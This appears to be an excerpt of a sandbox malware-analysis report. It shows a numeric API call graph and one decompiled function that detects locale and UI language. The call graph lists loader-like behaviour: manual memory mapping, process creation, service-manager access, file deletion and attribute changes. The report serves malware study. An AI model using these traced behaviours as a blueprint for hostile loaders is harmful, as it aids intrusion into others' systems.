30878->30923 30882 40c6c4 30880->30882 30884 40a1c2 117 API calls 30880->30884 30883 40c6e1 30882->30883 30885 40a1c2 117 API calls 30882->30885 30886 40c6fa 30883->30886 30887 40a1c2 117 API calls 30883->30887 30884->30882 30885->30883 30888 40c717 30886->30888 30889 40a1c2 117 API calls 30886->30889 30887->30886 30890 40c734 30888->30890 30892 40a1c2 117 API calls 30888->30892 30889->30888 30891 40c751 30890->30891 30893 40a1c2 117 API calls 30890->30893 30894 40c76e 30891->30894 30895 40a1c2 117 API calls 
30891->30895 30892->30890 30893->30891 30896 40c78b 30894->30896 30897 40a1c2 117 API calls 30894->30897 30895->30894 30898 40c7a4 30896->30898 30900 40a1c2 117 API calls 30896->30900 30897->30896 30899 40c7bd 30898->30899 30901 40a1c2 117 API calls 30898->30901 30902 40c7da 30899->30902 30903 40a1c2 117 API calls 30899->30903 30900->30898 30901->30899 30904 40c7f7 30902->30904 30905 40a1c2 117 API calls 30902->30905 30903->30902 30904->30906 30907 40a1c2 117 API calls 30904->30907 30905->30904 30906->30807 30907->30906 30909 403223 30908->30909 30910 403219 30908->30910 30912 410cb1 30909->30912 30943 401040 82 API calls ctype 30910->30943 30914 410cbc 30912->30914 30913 410cc1 30913->30813 30914->30913 30944 4076fe 82 API calls 30914->30944 30916 410cf7 WideCharToMultiByte 30945 405371 82 API calls _strlen 30916->30945 30918 410d10 30918->30813 30919->30814 30920->30821 30921->30825 30922->30828 30924 40db94 ctype 111 API calls 30923->30924 30925 40a1d2 30924->30925 30940 409ac5 GetModuleHandleA LoadLibraryA GetProcAddress 30925->30940 30927 40a1dc 30928 40a1e0 30927->30928 30931 40a1f1 30927->30931 30941 409b9a 116 API calls ctype 30928->30941 30930 40a1e8 30930->30880 30931->30930 30932 40db94 ctype 111 API calls 30931->30932 30933 40a203 30932->30933 30942 409a51 114 API calls 2 library calls 30933->30942 30935->30870 30936->30872 30937->30874 30938->30876 30939->30878 30940->30927 30941->30930 30942->30930 30943->30909 30944->30916 30945->30918 30946 22425e0 30952 2241000 30946->30952 30950 2242615 ExitProcess 30956 2241030 LoadLibraryW GetProcAddress 30952->30956 30955 22414a0 9 API calls 30955->30950 30997 2241b30 30956->30997 30959 2241091 SetLastError 30993 224102b 30959->30993 30960 22410a3 30961 2241b30 SetLastError 30960->30961 30962 22410b9 30961->30962 30963 22410f0 30962->30963 30964 22410de SetLastError 30962->30964 30962->30993 30965 2241111 30963->30965 30966 22410ff SetLastError 30963->30966 30964->30993 30967 224111c SetLastError 30965->30967 
30969 224112e GetNativeSystemInfo 30965->30969 30966->30993 30967->30993 30970 22411bc 30969->30970 30971 22411d7 SetLastError 30970->30971 30972 22411e9 30970->30972 30971->30993 31000 2241800 VirtualAlloc 30972->31000 30973 2241202 30974 224123d GetProcessHeap RtlAllocateHeap 30973->30974 31001 2241800 VirtualAlloc 30973->31001 30975 2241257 SetLastError 30974->30975 30976 224127b 30974->30976 30975->30993 30980 2241b30 SetLastError 30976->30980 30977 2241222 30977->30974 30978 224122e SetLastError 30977->30978 30978->30993 30981 22412fb 30980->30981 30982 2241302 30981->30982 31002 2241800 VirtualAlloc 30981->31002 31028 22416c0 GetProcessHeap HeapFree VirtualFree 30982->31028 30983 2241320 31003 2241b50 30983->31003 30986 224136b 30986->30982 31009 22421a0 30986->31009 30990 22413ca 30990->30982 30991 22413eb 30990->30991 30992 22413ff GetPEB 30991->30992 30991->30993 30992->30993 30993->30955 30998 2241070 30997->30998 30999 2241b3b SetLastError 30997->30999 30998->30959 30998->30960 30998->30993 30999->30998 31000->30973 31001->30977 31002->30983 31007 2241b7d 31003->31007 31004 2241b30 SetLastError 31005 2241c32 31004->31005 31006 2241be9 31005->31006 31029 2241800 VirtualAlloc 31005->31029 31006->30986 31007->31004 31007->31006 31010 22413b5 31009->31010 31011 22421dd IsBadHugeReadPtr 31009->31011 31010->30982 31022 2241e80 31010->31022 31011->31010 31013 2242207 31011->31013 31013->31010 31014 224224d 31013->31014 31015 2242239 SetLastError 31013->31015 31030 2241a20 VirtualQuery VirtualFree VirtualAlloc 31014->31030 31015->31010 31017 2242267 31018 2242273 SetLastError 31017->31018 31019 224229d 31017->31019 31018->31010 31019->31010 31021 22423ae SetLastError 31019->31021 31021->31010 31023 2241eba 31022->31023 31024 2241fe5 31023->31024 31026 2241fc1 31023->31026 31031 2241d10 31023->31031 31025 2241d10 2 API calls 31024->31025 31025->31026 31026->30990 31028->30993 31029->31006 31030->31017 31032 2241d29 31031->31032 31036 2241d1f 31031->31036 31033 
2241d37 31032->31033 31034 2241d9d VirtualProtect 31032->31034 31033->31036 31038 2241820 VirtualFree 31033->31038 31034->31036 31036->31023 31038->31036 31039 40ef65 8 API calls 31040 40a3d5 31041 40a3e6 31040->31041 31042 40a3e1 31040->31042 31048 409cbe 31041->31048 31045 40a40b DefWindowProcA 31045->31042 31046 40a3f9 31051 40a2e8 31046->31051 31049 409c23 ~_Task_impl 111 API calls 31048->31049 31050 409cc5 31049->31050 31050->31045 31050->31046 31052 40a2f4 __EH_prolog3_catch 31051->31052 31053 40f584 ctype 105 API calls 31052->31053 31054 40a303 31053->31054 31055 40a31a 31054->31055 31068 4037e3 2 API calls 4 library calls 31054->31068 31057 40a371 31055->31057 31069 4089e1 GetWindowRect GetWindowLongA 31055->31069 31063 4081dc 31057->31063 31060 40a39a ~_Task_impl 31060->31042 31071 409bf3 31063->31071 31065 408215 31065->31060 31070 40a26c 147 API calls ctype 31065->31070 31068->31055 31069->31057 31070->31060 31072 40f584 ctype 105 API calls 31071->31072 31073 409c05 31072->31073 31075 4080c3 2 API calls 31073->31075 31074 4081fe 31074->31065 31076 4080c3 31074->31076 31075->31074 31077 4080d0 31076->31077 31078 4080f2 CallWindowProcA 31076->31078 31077->31078 31080 4080de DefWindowProcA 31077->31080 31079 408105 31078->31079 31079->31065 31080->31079 31081 4245e7 TlsGetValue 31082 4245fa 31081->31082 31083 42461b GetModuleHandleA 31081->31083 31082->31083 31084 424604 TlsGetValue 31082->31084 31085 424644 31083->31085 31086 42462a GetProcAddress 31083->31086 31089 42460f 31084->31089 31087 424613 31086->31087 31087->31085 31088 42463a RtlEncodePointer 31087->31088 31088->31085 31089->31083 31089->31087 31090 4099f5 31091 409a22 31090->31091 31092 4099fe GetModuleHandleA 31090->31092 31092->31091 31093 409a0e LoadLibraryA 31092->31093 31093->31091 31094 404429 GetModuleFileNameA 31095 404459 31094->31095 31096 4044ac 31094->31096 31095->31096 31097 40445d PathFindExtensionA 31095->31097 31099 41e5df __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 
API calls 31096->31099 31097->31096 31098 40448d 31097->31098 31104 403ebb 70 API calls 2 library calls 31098->31104 31101 4044bb 31099->31101 31102 40449d 31105 404142 31102->31105 31104->31102 31136 41f6ea 31105->31136 31107 404166 GetModuleHandleA GetProcAddress 31108 40425d GetVersion 31107->31108 31109 40419d ConvertDefaultLocale ConvertDefaultLocale GetProcAddress 31107->31109 31110 40426b RegOpenKeyExA 31108->31110 31111 40431c GetModuleHandleA 31108->31111 31120 40421b 31109->31120 31121 4041eb ConvertDefaultLocale ConvertDefaultLocale 31109->31121 31112 40428c RegQueryValueExA 31110->31112 31113 40421d GetModuleFileNameA 31110->31113 31111->31113 31115 40432b EnumResourceLanguagesA 31111->31115 31118 4042b1 31112->31118 31119 40430e RegCloseKey 31112->31119 31116 404384 _memset 31113->31116 31117 404256 31113->31117 31115->31113 31122 40434c ConvertDefaultLocale ConvertDefaultLocale 31115->31122 31137 403901 31116->31137 31124 41e5df __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 31117->31124 31118->31119 31174 41fd26 68 API calls _vscan_fn 31118->31174 31119->31113 31120->31113 31121->31120 31122->31113 31127 40441f 31124->31127 31127->31096 31128 4042cc 31128->31119 31130 4042d4 ConvertDefaultLocale ConvertDefaultLocale 31128->31130 31130->31119 31132 4043f2 31175 403fd8 DeactivateActCtx ReleaseActCtx 31132->31175 31135 4043c8 31135->31132 31148 403f0b 31135->31148 31136->31107 31138 4039a9 31137->31138 31139 40391e GetModuleHandleA 31137->31139 31144 4039b1 31138->31144 31140 403934 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 31139->31140 31142 40392f 31139->31142 31140->31142 31143 4039a2 31142->31143 31176 4037e3 2 API calls 4 library calls 31142->31176 31143->31138 31145 4039c1 31144->31145 31146 4039bd 31144->31146 31145->31146 31147 4039d1 CreateActCtxA 31145->31147 31146->31135 31147->31146 31149 403f30 31148->31149 31150 403f94 GetLocaleInfoA 31148->31150 31180 41fc1e 68 API calls _xtoa_s@20 31149->31180 31152 
403f43 31150->31152 31153 403fa6 31150->31153 31155 41f8d2 _xtoa_s@20 68 API calls 31152->31155 31156 41e5df __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 31153->31156 31154 403f3d 31181 402f17 2 API calls 4 library calls 31154->31181 31158 403f4d 31155->31158 31159 403fd6 31156->31159 31160 41f8d2 _xtoa_s@20 68 API calls 31158->31160 31159->31135 31161 403f54 31160->31161 31177 41fc9f 31161->31177 31164 41f8d2 _xtoa_s@20 68 API calls 31165 403f80 31164->31165 31166 403f85 31165->31166 31167 403fa8 31165->31167 31168 41f8d2 _xtoa_s@20 68 API calls 31166->31168 31169 41f8d2 _xtoa_s@20 68 API calls 31167->31169 31170 403f8a 31168->31170 31171 403f91 31169->31171 31182 4031bc 82 API calls ctype 31170->31182 31171->31153 31173 403fb8 LoadLibraryA 31171->31173 31173->31153 31174->31128 31175->31117 31176->31140 31183 421880 31177->31183 31180->31154 31181->31152 31182->31171 31184 4218ac 31183->31184 31185 42188c 31183->31185 31187 4218ba 31184->31187 31189 4218e1 31184->31189 31186 41f8d2 _xtoa_s@20 68 API calls 31185->31186 31188 421891 31186->31188 31190 41f8d2 _xtoa_s@20 68 API calls 31187->31190 31192 403f76 31187->31192 31213 424e06 4 API calls 2 library calls 31188->31213 31194 41f8d2 _xtoa_s@20 68 API calls 31189->31194 31193 4218d6 31190->31193 31192->31164 31216 424e06 4 API calls 2 library calls 31193->31216 31195 4218e6 31194->31195 31197 421921 31195->31197 31198 4218f4 31195->31198 31215 421715 102 API calls 2 library calls 31197->31215 31214 421715 102 API calls 2 library calls 31198->31214 31201 421932 31203 42195a 31201->31203 31205 421944 31201->31205 31202 421906 31202->31203 31204 42190e 31202->31204 31203->31192 31210 41f8d2 _xtoa_s@20 68 API calls 31203->31210 31206 41f8d2 _xtoa_s@20 68 API calls 31204->31206 31207 41f8d2 _xtoa_s@20 68 API calls 31205->31207 31208 421913 31206->31208 31209 421949 31207->31209 31208->31192 31211 41f8d2 _xtoa_s@20 68 API calls 31208->31211 31209->31192 31212 41f8d2 _xtoa_s@20 68 API calls 
31209->31212 31210->31193 31211->31192 31212->31192 31214->31202 31215->31201 31217 41dfeb 31218 41e009 31217->31218 31219 41dff8 31217->31219 31221 41e007 31218->31221 31222 41e01a SendMessageA 31218->31222 31223 405bfb 31219->31223 31222->31221 31224 405c29 31223->31224 31225 405c05 31223->31225 31224->31221 31226 409cbe 111 API calls 31225->31226 31227 405c0e 31226->31227 31231 40ec19 31227->31231 31232 40ec20 31231->31232 31233 405c19 31231->31233 31269 40ebda LocalAlloc RaiseException ctype 31232->31269 31233->31224 31235 401e30 31233->31235 31270 406041 31235->31270 31237 401e60 GetSystemMenu 31289 40deed 31237->31289 31239 401e75 31240 401fc6 SendMessageA SendMessageA 31239->31240 31243 402890 ctype 82 API calls 31239->31243 31241 402023 31240->31241 31242 402014 31240->31242 31245 40ca8b EnableWindow 31241->31245 31244 40ca8b EnableWindow 31242->31244 31246 401e8a 31243->31246 31247 402021 31244->31247 31245->31247 31248 40ddfe 111 API calls 31246->31248 31249 40203c 31247->31249 31250 40204e 31247->31250 31251 401e98 31248->31251 31253 40ca8b EnableWindow 31249->31253 31252 40ca8b EnableWindow 31250->31252 31254 401ea1 31251->31254 31255 402910 88 API calls 31251->31255 31256 40204c 31252->31256 31253->31256 31257 401eca AppendMenuA AppendMenuA 31254->31257 31258 401efb 31254->31258 31255->31254 31256->31224 31257->31258 31259 401d20 70 API calls 31258->31259 31260 401f1c 31259->31260 31261 401f20 GetProcAddress 31260->31261 31262 401f33 31260->31262 31261->31262 31263 401f3d GetProcAddress 31262->31263 31264 401a70 GetProcAddress GetProcAddress 31263->31264 31265 401f6d 31264->31265 31266 401f79 VirtualAlloc 31265->31266 31267 401f8c 31265->31267 31266->31267 31268 401f92 31267->31268 31268->31240 31269->31233 31271 406053 31270->31271 31272 40604b 31270->31272 31293 40c865 166 API calls ctype 31271->31293 31292 40c41c 162 API calls ctype 31272->31292 31275 406051 31276 406061 31275->31276 31295 4095e0 105 API calls 3 library calls 31275->31295 31294 
405cf9 EndDialog 31276->31294 31279 406068 31279->31237 31280 406073 31280->31276 31281 406079 31280->31281 31296 40c907 113 API calls 31281->31296 31283 406083 31284 406089 31283->31284 31285 40609d 31283->31285 31297 405feb 111 API calls ctype 31284->31297 31285->31237 31287 40608e 31298 40ca4f ShowWindow 31287->31298 31299 40de79 111 API calls 3 library calls 31289->31299 31291 40def4 31292->31275 31293->31275 31294->31279 31295->31280 31296->31283 31297->31287 31298->31285 31299->31291 31300 4265a8 31302 4265ac 31300->31302 31303 4265eb 31302->31303 31304 4265cc Sleep 31302->31304 31306 41ed6a 31302->31306 31305 4265e1 31304->31305 31305->31302 31305->31303 31307 41ed76 __lseeki64 31306->31307 31308 41ed8e 31307->31308 31318 41edad _memset 31307->31318 31309 41f8d2 _xtoa_s@20 67 API calls 31308->31309 31310 41ed93 31309->31310 31319 424e06 4 API calls 2 library calls 31310->31319 31312 41ee1f RtlAllocateHeap 31312->31318 31315 41eda3 __lseeki64 31315->31302 31318->31312 31318->31315 31320 422e2d 68 API calls 2 library calls 31318->31320 31321 42367a 5 API calls 2 library calls 31318->31321 31322 41ee66 LeaveCriticalSection _doexit 31318->31322 31323 4260d0 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 31318->31323 31320->31318 31321->31318 31322->31318 31323->31318 31324 22541df 31329 22547eb 31324->31329 31326 22541e4 31364 2252f84 31326->31364 31363 2254809 31329->31363 31334 2254f62 31450 2255c4a GetPEB RtlAllocateHeap 31334->31450 31340 2254873 31340->31326 31351 2252fdf GetPEB 31351->31363 31355 225486e 31370 22560b0 31355->31370 31360 2252f84 GetPEB 31360->31363 31363->31334 31363->31340 31363->31351 31363->31355 31363->31360 31378 2255fab 31363->31378 31387 22558e8 31363->31387 31399 22567ed 31363->31399 31411 2254fac 31363->31411 31415 2255aa1 31363->31415 31421 2255dd6 31363->31421 31430 22565d3 GetPEB 31363->31430 31431 22576e4 GetPEB 31363->31431 31432 22562cf GetPEB 31363->31432 31433 2251191 GetPEB RtlAllocateHeap 
31363->31433 31434 2256168 GetPEB 31363->31434 31435 22577b5 GetPEB RtlAllocateHeap 31363->31435 31436 2255186 GetPEB RtlAllocateHeap 31363->31436 31437 2254564 GetPEB RtlAllocateHeap 31363->31437 31438 22550b4 GetPEB RtlAllocateHeap 31363->31438 31439 2254465 GetPEB RtlAllocateHeap 31363->31439 31440 2256c6b GetPEB RtlAllocateHeap 31363->31440 31441 2256435 GetPEB RtlAllocateHeap 31363->31441 31442 2255c25 GetPEB 31363->31442 31443 225786e GetPEB RtlAllocateHeap CreateProcessW 31363->31443 31444 2253b4e GetPEB 31363->31444 31445 2256d1a GetPEB 31363->31445 31446 2253351 GetPEB 31363->31446 31447 22566ad GetPEB RtlAllocateHeap 31363->31447 31448 22525ec GetPEB RtlAllocateHeap 31363->31448 31449 22515c1 GetPEB RtlAllocateHeap 31363->31449 31365 2252f96 31364->31365 31366 2252fa4 ExitProcess 31364->31366 31511 2252ec1 GetPEB 31365->31511 31368 2252f9b 31512 2252e2c GetPEB 31368->31512 31376 22560c8 31370->31376 31372 22560d7 31451 22535f0 31372->31451 31373 2252f84 GetPEB 31373->31376 31374 22560e5 31374->31340 31376->31372 31376->31373 31376->31374 31461 2252674 31376->31461 31464 2252fdf 31376->31464 31379 2255fc3 31378->31379 31380 225609a 31379->31380 31381 2252f84 GetPEB 31379->31381 31384 2252674 2 API calls 31379->31384 31385 2256098 31379->31385 31386 2252fdf GetPEB 31379->31386 31477 225283c 31379->31477 31490 22527d0 31380->31490 31381->31379 31384->31379 31385->31363 31386->31379 31397 22558ff 31387->31397 31388 2255a7f 31389 2252f84 GetPEB 31388->31389 31391 2255a7d 31389->31391 31390 2252f84 GetPEB 31390->31397 31391->31363 31392 2252f84 GetPEB 31394 2255a1c CreateFileW 31392->31394 31393 2252674 2 API calls 31393->31397 31394->31391 31394->31397 31395 2252f84 GetPEB 31396 2255996 SetFileInformationByHandle 31395->31396 31396->31397 31397->31388 31397->31390 31397->31391 31397->31392 31397->31393 31397->31395 31398 2252fdf GetPEB 31397->31398 31398->31397 31403 2256808 31399->31403 31400 2253037 2 API calls 31400->31403 31401 2252f84 GetPEB 31404 22568d8 
OpenSCManagerW 31401->31404 31402 2252f84 GetPEB 31402->31403 31403->31400 31403->31401 31403->31402 31406 2256943 31403->31406 31408 225697a 31403->31408 31500 2255667 GetPEB 31403->31500 31404->31403 31407 2252f84 GetPEB 31406->31407 31409 2256961 31407->31409 31408->31363 31499 2252473 FindFirstFileW FindNextFileW FindClose GetPEB RtlAllocateHeap 31409->31499 31412 2254fc6 31411->31412 31413 225509e 31412->31413 31414 2254f76 GetPEB RtlAllocateHeap LoadLibraryW 31412->31414 31413->31363 31414->31412 31417 2255abb 31415->31417 31416 2252f84 GetPEB 31418 2255b95 CreateFileW 31416->31418 31417->31416 31419 2255bd3 31417->31419 31420 2252f84 GetPEB 31417->31420 31418->31417 31418->31419 31419->31363 31420->31417 31426 2255df7 31421->31426 31422 2252674 2 API calls 31422->31426 31424 2252f84 GetPEB 31424->31426 31425 2255e2b 31427 2252f84 GetPEB 31425->31427 31426->31422 31426->31424 31426->31425 31428 2255e40 31426->31428 31429 2252fdf GetPEB 31426->31429 31501 225390f 31426->31501 31427->31428 31428->31363 31429->31426 31430->31363 31431->31363 31432->31363 31433->31363 31434->31363 31435->31363 31436->31363 31437->31363 31438->31363 31439->31363 31440->31363 31441->31363 31442->31363 31443->31363 31444->31363 31445->31363 31446->31363 31447->31363 31448->31363 31449->31363 31450->31340 31469 2252fb5 31451->31469 31454 2252f84 GetPEB 31455 2253637 CreateProcessW 31454->31455 31456 225363e 31455->31456 31457 2253645 31455->31457 31456->31457 31458 2252f84 GetPEB 31456->31458 31457->31374 31459 2253668 31458->31459 31460 2252f84 GetPEB 31459->31460 31460->31457 31472 2253037 31461->31472 31463 22526a8 31463->31376 31463->31463 31465 2252f84 GetPEB 31464->31465 31466 2252ff6 31465->31466 31467 2252f84 GetPEB 31466->31467 31468 2253011 31467->31468 31468->31376 31470 2252f84 GetPEB 31469->31470 31471 2252fd0 31470->31471 31471->31454 31473 2252f84 GetPEB 31472->31473 31474 225304e 31473->31474 31475 2252f84 GetPEB 31474->31475 31476 2253066 RtlAllocateHeap 31475->31476 
31476->31463 31478 2252fb5 GetPEB 31477->31478 31479 2252855 31478->31479 31480 2252fb5 GetPEB 31479->31480 31481 2252864 31480->31481 31482 2252fb5 GetPEB 31481->31482 31483 2252871 31482->31483 31484 2252f84 GetPEB 31483->31484 31485 2252891 31484->31485 31486 2252f84 GetPEB 31485->31486 31487 22528a7 31486->31487 31488 2252f84 GetPEB 31487->31488 31489 22528e8 31488->31489 31489->31379 31491 2252674 2 API calls 31490->31491 31492 22527e7 31491->31492 31493 2252f84 GetPEB 31492->31493 31494 225280b 31493->31494 31495 2252fdf GetPEB 31494->31495 31496 2252818 31495->31496 31497 2252f84 GetPEB 31496->31497 31498 2252833 DeleteFileW 31497->31498 31498->31385 31499->31408 31500->31403 31503 225392b 31501->31503 31502 2253037 GetPEB RtlAllocateHeap 31502->31503 31503->31502 31504 2253b3f 31503->31504 31505 2252f84 GetPEB 31503->31505 31508 2253b46 31503->31508 31509 2252fdf GetPEB 31503->31509 31510 2252f84 GetPEB 31503->31510 31507 2252fdf GetPEB 31504->31507 31506 2253af0 OpenServiceW 31505->31506 31506->31503 31507->31508 31508->31426 31509->31503 31510->31503 31511->31368 31512->31366 31513 403afd 31514 403b0b 31513->31514 31517 403a3a 31514->31517 31518 403af5 31517->31518 31522 403a6e 31517->31522 31519 403a6f RegOpenKeyExA 31519->31522 31520 403a8c RegQueryValueExA 31520->31522 31521 403ade RegCloseKey 31521->31522 31522->31518 31522->31519 31522->31520 31522->31521

                                                      Executed Functions

                                                      Control-flow Graph

                                                      C-Code - Quality: 84%
                                                      			E00404142(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* __ebp;
                                                      				signed int _t73;
                                                      				struct HINSTANCE__* _t78;
                                                      				_Unknown_base(*)()* _t79;
                                                      				struct HINSTANCE__* _t81;
                                                      				signed int _t92;
                                                      				signed int _t94;
                                                      				unsigned int _t97;
                                                      				void* _t113;
                                                      				unsigned int _t115;
                                                      				signed short _t123;
                                                      				unsigned int _t124;
                                                      				int _t129;
                                                      				int _t130;
                                                      				_Unknown_base(*)()* _t131;
                                                      				signed short _t133;
                                                      				unsigned int _t134;
                                                      				intOrPtr _t143;
                                                      				void* _t144;
                                                      				int _t145;
                                                      				int _t146;
                                                      				signed int _t164;
                                                      				void* _t167;
                                                      				signed int _t169;
                                                      				void* _t170;
                                                      				int _t172;
                                                      				signed int _t176;
                                                      				void* _t177;
                                                      				CHAR* _t181;
                                                      				void* _t183;
                                                      				void* _t184;
                                                      
                                                      				_t167 = __edx;
                                                      				_t184 = _t183 - 0x118;
                                                      				_t181 = _t184 - 4;
                                                      				_t73 =  *0x443590; // 0xa920217c
                                                      				_t181[0x118] = _t73 ^ _t181;
                                                      				_push(0x58);
                                                      				E0041F6EA(E00431C66, __ebx, __edi, __esi);
                                                      				_t169 = 0;
                                                      				 *(_t181 - 0x40) = _t181[0x124];
                                                      				 *(_t181 - 0x14) = 0;
                                                      				 *(_t181 - 0x10) = 0;
                                                      				_t78 = GetModuleHandleA("kernel32.dll");
                                                      				 *(_t181 - 0x18) = _t78;
                                                      				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
                                                      				if(_t79 == 0) {
                                                      					if(GetVersion() >= 0) {
                                                      						_t81 = GetModuleHandleA("ntdll.dll");
                                                      						if(_t81 != 0) {
                                                      							 *(_t181 - 0x14) = 0;
                                                      							EnumResourceLanguagesA(_t81, 0x10, 1, E004038EB, _t181 - 0x14);
                                                      							if( *(_t181 - 0x14) != 0) {
                                                      								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
                                                      								_t145 = _t97 & 0x3ff;
                                                      								 *(_t181 - 0x34) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
                                                      								 *(_t181 - 0x30) = ConvertDefaultLocale(_t145);
                                                      								 *(_t181 - 0x10) = 2;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						 *(_t181 - 0x18) = 0;
                                                      						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
                                                      							 *(_t181 - 0x44) = 0x10;
                                                      							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
                                                      								_t113 = E0041FD26( &(_t181[0x108]), "%x", _t181 - 0x1c);
                                                      								_t184 = _t184 + 0xc;
                                                      								if(_t113 == 1) {
                                                      									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
                                                      									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
                                                      									_t146 = _t115 & 0x3ff;
                                                      									 *(_t181 - 0x34) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
                                                      									 *(_t181 - 0x30) = ConvertDefaultLocale(_t146);
                                                      									 *(_t181 - 0x10) = 2;
                                                      								}
                                                      							}
                                                      							RegCloseKey( *(_t181 - 0x18));
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t123 =  *_t79() & 0x0000ffff;
                                                      					 *(_t181 - 0x14) = _t123;
                                                      					_t124 = _t123 & 0x0000ffff;
                                                      					_t164 = _t124 & 0x3ff;
                                                      					 *(_t181 - 0x1c) = _t164;
                                                      					_t129 = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164); // executed
                                                      					 *(_t181 - 0x34) = _t129;
                                                      					_t130 = ConvertDefaultLocale( *(_t181 - 0x1c)); // executed
                                                      					 *(_t181 - 0x30) = _t130;
                                                      					 *(_t181 - 0x10) = 2;
                                                      					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
                                                      					if(_t131 != 0) {
                                                      						_t133 =  *_t131() & 0x0000ffff;
                                                      						 *(_t181 - 0x14) = _t133;
                                                      						_t134 = _t133 & 0x0000ffff;
                                                      						_t172 = _t134 & 0x3ff;
                                                      						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
                                                      						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
                                                      						 *(_t181 - 0x10) = 4;
                                                      					}
                                                      					_t169 = 0;
                                                      				}
                                                      				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
                                                      				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
                                                      				_t181[0x105] = 0;
                                                      				_t181[0x104] = 0;
                                                      				if(GetModuleFileNameA(0x400000, _t181, 0x105) != _t169) {
                                                      					_t143 = 0x20;
                                                      					E0041F330(_t169, _t181 - 0x64, _t169, _t143);
                                                      					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
                                                      					 *(_t181 - 0x5c) = _t181;
                                                      					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
                                                      					 *(_t181 - 0x48) = 0x400000;
                                                      					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
                                                      					E00403901(_t181 - 0x3c, 0x400000, 0xffffffff);
                                                      					 *(_t181 - 4) = _t169;
                                                      					if(E004039B1(_t181 - 0x3c, _t181 - 0x64) != 0) {
                                                      						E004039E7(_t181 - 0x3c);
                                                      					}
                                                      					_t176 = 0;
                                                      					if( *(_t181 - 0x10) <= _t169) {
                                                      						L23:
                                                      						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
                                                      						E00403FD8(_t181 - 0x3c);
                                                      						_t92 = _t169;
                                                      						goto L24;
                                                      					} else {
                                                      						while(1) {
                                                      							_t94 = E00403F0B(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]); // executed
                                                      							if(_t94 != _t169) {
                                                      								break;
                                                      							}
                                                      							_t176 =  &(1[_t176]);
                                                      							if(_t176 <  *(_t181 - 0x10)) {
                                                      								continue;
                                                      							}
                                                      							goto L23;
                                                      						}
                                                      						_t169 = _t94;
                                                      						goto L23;
                                                      					}
                                                      				} else {
                                                      					_t92 = 0;
                                                      					L24:
                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
                                                      					_pop(_t170);
                                                      					_pop(_t177);
                                                      					_pop(_t144);
                                                      					return E0041E5DF(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
                                                      				}
                                                      			}



































                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00404161
                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 00404182
                                                      • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00404193
                                                      • ConvertDefaultLocale.KERNELBASE(?), ref: 004041C9
                                                      • ConvertDefaultLocale.KERNELBASE(?), ref: 004041D1
                                                      • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 004041E5
                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 00404209
                                                      • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0040420F
                                                      • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00404248
                                                      • GetVersion.KERNEL32 ref: 0040425D
                                                      • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00404282
                                                      • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 004042A7
                                                      • _sscanf.LIBCMT ref: 004042C7
                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 004042FC
                                                      • ConvertDefaultLocale.KERNEL32(74784EE0), ref: 00404302
                                                      • RegCloseKey.ADVAPI32(?), ref: 00404311
                                                      • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00404321
                                                      • EnumResourceLanguagesA.KERNEL32 ref: 0040433C
                                                      • ConvertDefaultLocale.KERNEL32(?), ref: 0040436D
                                                      • ConvertDefaultLocale.KERNEL32(74784EE0), ref: 00404373
                                                      • _memset.LIBCMT ref: 0040438D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
